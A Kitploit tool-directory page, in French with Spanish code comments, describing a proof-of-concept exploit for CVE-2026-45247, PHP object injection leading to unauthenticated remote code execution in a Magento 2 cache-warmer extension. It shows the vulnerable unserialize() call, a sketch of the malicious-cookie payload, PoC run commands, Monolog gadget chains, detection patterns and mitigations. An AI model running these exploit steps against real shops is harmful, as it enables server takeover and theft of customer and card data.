Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE- — PoC fonctionnel de CVE-2026-45247 : injection d'objets PHP vers RCE non authentifié dans Mirasvit Full Page Cache (Magento 2). | Kitploit
Outils/GitHubGitHub/fevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubfevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-

PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE-

PoC fonctionnel de CVE-2026-45247 : injection d'objets PHP vers RCE non authentifié dans Mirasvit Full Page Cache (Magento 2).

Voir le dépôt
2il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-45247 - Mirasvit Full Page Cache Warmer pour Magento 2 - Injection d'objets PHP → RCE

CVE-2026-45247 CVSS CISA KEV

📋 Description

CVE-2026-45247 est une vulnérabilité critique d'Injection d'objets PHP (PHP Object Injection) dans l'extension Mirasvit Full Page Cache Warmer pour Magento 2 et Adobe Commerce. Un attaquant non authentifié peut parvenir à une Exécution de code à distance (RCE) en envoyant un objet PHP sérialisé manipulé dans le cookie CacheWarmer.

La vulnérabilité réside dans l'appel sans restriction à la fonction native unserialize() de PHP, combiné avec des chaînes de gadgets (gadget chains) disponibles dans Magento et ses dépendances (notamment Monolog).

AttributValeur
CVECVE-2026-45247
ProduitMirasvit Full Page Cache Warmer for Magento 2
Versions affectéesToutes les versions antérieures à 1.11.12
Correctif disponibleVersion 1.11.12 (25 mai 2026)
Score CVSS9.8 (Critique)
VecteurAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Statut dans CISA KEVExploitation active confirmée (ajoutée le 03/06/2026)
Date limite06/06/2026

🚨 Mécanisme d'attaque

  1. L'extension traite le cookie CacheWarmer à chaque requête de boutique
  2. La valeur du cookie est passée à unserialize() sans assainissement
  3. Un attaquant envoie un objet PHP sérialisé malveillant
  4. En utilisant des chaînes de gadgets de Monolog (SyslogUdpHandler, BufferHandler, FingersCrossedHandler), on obtient une RCE
  5. La commande est exécutée sur le serveur avec les privilèges du service web

⚙️ Phases de l'attaque

Phase 1 : Reconnaissance

root@kitploit:~
# Verificar si la tienda usa Mirasvit Cache Warmer
curl -s https://tienda.com/pub/media/mirasvit/cache_warmer/CHANGELOG.md

Phase 2 : Analyse de la vulnérabilité

root@kitploit:~
# La cookie se procesa en cada request sin autenticación
# El código vulnerable en Mirasvit:
$cookieValue = $_COOKIE['CacheWarmer'];
$data = unserialize(base64_decode($cookieValue));  # ¡Peligro!

Phase 3 : Exécution de l'exploit

root@kitploit:~
# Construcción de la cookie maliciosa
payload = serialize(PHPObjectInjection())
cookie_value = f"CacheWarmer:{base64_encode(payload)}"

# Envío de la petición
requests.get(target, cookies={'CacheWarmer': cookie_value})

🛠️ Utilisation du PoC

Installation

root@kitploit:~
git clone https://github.com/tu-usuario/CVE-2026-45247.git
cd CVE-2026-45247
pip install requests

Exécution de base

root@kitploit:~
# Verificar vulnerabilidad
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com --check-only

# Ejecutar comando 'id'
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "id"

# Ejecutar comando personalizado
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "whoami"

# Usar proxy para depuración
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "ls -la" --proxy http://127.0.0.1:8080

Script rapide

root@kitploit:~
# Verificar con script bash
chmod +x check_cve_2026_45247.sh
./check_cve_2026_45247.sh https://tienda.ejemplo.com

📊 Impact démontré

  • Exécution de commandes à distance (RCE) sur le serveur Magento
  • Accès complet à la base de données des clients et commandes
  • Installation de webshells pour persistance
  • Compromission totale de la boutique en ligne
  • Fuite potentielle de données de cartes de crédit
  • Mouvement latéral dans l'infrastructure d'entreprise

🛡️ Détection

Indicateurs de compromission (IOCs)

Dans les logs d'accès :

root@kitploit:~
CacheWarmer: (Tz|Qz|YT)[a-zA-Z0-9+/=]+

Commandes observées lors de l'exploitation :

root@kitploit:~
echo PWNED_CVE2026_$(date +%s)
sleep 5

Chaînes de gadgets utilisées :

  • Monolog\Handler\SyslogUdpHandler
  • Monolog\Handler\BufferHandler
  • Monolog\Handler\FingersCrossedHandler
  • Monolog\Handler\GroupHandler

🔧 Atténuation

Mise à jour immédiate

root@kitploit:~
# Actualizar a versión parcheada
composer require mirasvit/module-cache-warmer:1.11.12
bin/magento cache:flush

Atténuations temporaires

root@kitploit:~
# Bloquear cookie CacheWarmer en .htaccess o nginx
RewriteCond %{HTTP_COOKIE} CacheWarmer
RewriteRule .* - [F,L]
root@kitploit:~
// En app/code/local/Custom/BlockCookie.php
if (isset($_COOKIE['CacheWarmer'])) {
    unset($_COOKIE['CacheWarmer']);
}
Télécharger l’outil